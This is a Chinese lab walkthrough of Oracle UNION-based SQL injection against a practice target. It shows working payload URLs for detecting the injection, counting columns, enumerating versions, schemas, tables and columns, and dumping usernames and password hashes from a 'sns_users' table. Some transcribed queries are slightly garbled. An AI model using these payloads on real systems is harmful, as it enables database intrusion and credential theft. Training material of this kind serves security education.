0x01判断类型到二分法字段与联合查询
判断类型
网站链接:http://219.153.49.228:44714/new_list.php?id=1
数据库语句:select * FROM CLASSINFO WHERE CLASSID='88'
假设是字符型,通过在参数后面加单引号来前后闭合继续接下来的操作即可)
正常来说,两个单引号应该做到了前后闭合的作用,但此时页面还是错误状态,证明了此时的数据库语句应该是这样的select * FROM CLASSINFO WHERE CLASSID=88''
那么这里应该是数字型注入
猜字段
网站链接:http://219.153.49.228:40466/new_list.php?id=1 order by 2 正确
数据库语句:select * FROM CLASSINFO WHERE CLASSID=88 order by 2
网站链接:http://219.153.49.228:40466/new_list.php?id=1 order by 3 错误
数据库语句:select * FROM CLASSINFO WHERE CLASSID=88 order by 3
报错信息,ORDER BY 项必须是 SELECT-list 表达式的数目,换个说法就是,order by 必须是select查询的list列表达式的数目,但大过了当前查询列的数目后则报错,当数目小或者等于的时候是true即是正确
联合查询
oracle对数据类型有严格要求,进行联合查询的时候,如果当前表内列什么数据类型 ,那么联合查询就要根据他们的类型来,在oracle可以用null来代替字符或数字
网站链接:http://219.153.49.228:46651/new_list.php?id=1 union select null,null from dual
数据库语句:select * FROM CLASSINFO WHERE CLASSID=88 union select null,null from dual
如果当前字段并不多的话,建议还是对列进行类型判断。
http://219.153.49.228:46651/new_list.php?id=1 union select 1,2 from dual (页面错误)
http://219.153.49.228:46651/new_list.php?id=1 union select ‘1’,2 from dual (页面错误)
http://219.153.49.228:46651/new_list.php?id=1 union select 1,’2’ from dual (页面错误)
http://219.153.49.228:46651/new_list.php?id=1 union select ‘1’,’2’ from dual (页面正常)
0x02分页与过滤查询要求,查数据库及爆表
Oracle与mysql是不一样的,分页中没有limit,而是使用三层查询嵌套的方式实现分页
例:SELECT * FROM ( SELECT A.*, ROWNUM RN FROM (select * from session_roles) A WHERE ROWNUM <= 1 ) WHERE RN >= 0
分页
网站链接:http://219.153.49.228:47653/new_list.php?id=1 union select ‘1’,(SELECT BANNER FROM ( SELECT A., ROWNUM RN FROM (select banner from sys.v_$version) A WHERE ROWNUM <= 99 ) WHERE RN >= 1 and rownum=1) from dual
数据库语句:select FROM CLASSINFO WHERE CLASSID=88 union select null,(SELECT BANNER FROM ( SELECT A.*, ROWNUM RN FROM (select banner from sys.v_$version) A WHERE ROWNUM <= 99 ) WHERE RN >= 1 and rownum=1) from dual
过滤查询
Oracle不等于号有几种方式:<>,!=,^=
网站链接:http://219.153.49.228:47653/new_list.php?id=1 union select ‘1’,(select banner from sys.v$version where rownum=1 and banner<>’Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production’) from dual
数据库语句(版本不一样,所以语句不一样):select * FROM CLASSINFO WHERE CLASSID=88 union select 1,(select banner from sys.v$version where rownum=1 and banner<>’Oracle Database 11g Enterprise Edition Release 11.2.0.1.0 - 64bit Production’) from dual
爆库
网站链接:http://219.153.49.228:47653/new_list.php?id=1 union select ‘1’,(select owner from all_tables where rownum=1) from dual
数据库语句:select FROM CLASSINFO WHERE CLASSID=88 union SELECT 1,(select owner from all_tables where rownum=1) from dual
网站链接:http://219.153.49.228:47653/new_list.php?id=1 union select ‘1’,(select owner from all_tables where rownum=1 and owner<>’SYS’) from dual
数据库语句:select FROM CLASSINFO WHERE CLASSID=88 union select 1,(select owner from all_tables where rownum=1 and owner<>’SYS’) from dual 
爆表
网站链接:http://219.153.49.228:47653/new_list.php?id=1 union select ‘1’,(select table_name from user_tables where rownum=1) from dual
数据库语句:select FROM CLASSINFO WHERE CLASSID=88 union select 1,(select owner from all_tables where rownum=1 and owner<>’SYS’) from dual 
为了可以在大量的表中找到我们需要的表,这里提供几个敏感表名会夹带的,user,use,name,pass,password
网站链接:http://219.153.49.228:48635/new_list.php?id=1 union select ‘1’,(select table_name from user_tables where rownum=1 and table_name like ‘%USER%’) from dual
数据库语句:select FROM CLASSINFO WHERE CLASSID=88 union select 1,(select table_name from user_tables where rownum=1 and table_name like ‘%USER%’) from dual 
0x03爆列爆数据
爆列名
网站链接:http://219.153.49.228:48635/new_list.php?id=1 union select ‘1’,(select column_name from user_tab_columns WHERE table_name=’sns_users’ and rownum=1) from dual
数据库语句:select * FROM CLASSINFO WHERE CLASSID=88 union select 1,(select column_name from user_tab_columns WHERE table_name=’sns_users’ and rownum=1) from dual 
爆第二条列名
网站链接:http://219.153.49.228:48635/new_list.php?id=1 union select ‘1’,(select column_name from user_tab_columns WHERE table_name=’sns_users’ and rownum=1 and column_name<>’USER_NAME’) from dual
数据库语句:select * FROM CLASSINFO WHERE CLASSID=88 union select ‘1’,(select column_name from user_tab_columns WHERE table_name=’sns_users’ and rownum=1 and column_name<>’USER_NAME’) from dual
爆数据
第一种,相同类型的列
网站链接:http://219.153.49.228:41883/new_list.php?id=1 union select (select USER_PWD from “sns_users”),(select USER_PWD from “sns_users”) from dual 这里重点说一下,为啥表名要加双引号,这里是致命题,一定要看下面的图
特点
大概``意思``是``Oracle默认是大写的,如果我们双引号括起来的区分大小写,如果没有,系统会自动转成大小写
数据库语句:select * FROM CLASSINFO WHERE CLASSID=88 union select (select USER_PWD from “sns_users”),(select USER_PWD from “sns_users”) from dual
由于这里靶场是有问题的,无法这样执行,所以贴数据库的图
第二种,CONCAT函数与连接符
网站链接:http://219.153.49.228:41883/new_list.php?id=1 and 1=2 union SELECT CONCAT(user_name,USER_PWD),’2’ FROM “sns_users”
数据库语句:select * FROM CLASSINFO WHERE CLASSID=88 and 1=2 union SELECT CONCAT(user_name,USER_PWD),’2’ FROM “sns_users”
连接符(||)
网站链接:http://219.153.49.228:41883/new_list.php?id=1 and 1=2 union SELECT user_name||USER_PWD,’2’ FROM “sns_users”
数据库语句:select * FROM CLASSINFO WHERE CLASSID=88 and 1=2 union SELECT user_name||USER_PWD,’2’ FROM “sns_users”
第三种,正常字段取法
网站链接:http://219.153.49.228:41883/new_list.php?id=1 and 1=2 union SELECT user_name,USER_PWD FROM “sns_users”
数据库语句:select * FROM CLASSINFO WHERE CLASSID=88 and 1=2 union SELECT user_name,USER_PWD FROM “sns_users”
若有收获,就点个赞吧
0 人点赞
